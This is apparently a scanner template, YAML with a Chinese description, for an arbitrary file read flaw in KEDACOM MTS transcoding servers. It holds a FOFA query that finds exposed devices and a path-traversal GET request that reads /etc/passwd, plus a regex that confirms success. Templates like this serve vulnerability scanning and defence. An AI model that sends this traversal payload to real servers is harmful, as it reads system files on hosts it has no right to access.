漏洞描述
KEDACOM MTS转码服务器存在任意文件读取漏洞,攻击这通过漏洞可以读取服务器任意信息
fofa: app="MTS转码服务器"
id: kedacom-mts-file-read
info:
name: 科达 MTS转码服务器 任意文件读取漏洞
author: zan8in
severity: high
description: |-
KEDACOM MTS转码服务器存在任意文件读取漏洞,攻击这通过漏洞可以读取服务器任意信息
fofa: app="MTS转码服务器"
tags: kedacom,mts,lfi
created: 2024/02/29
rules:
r0:
request:
method: GET
path: /../../../../../../../../etc/passwd
expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0()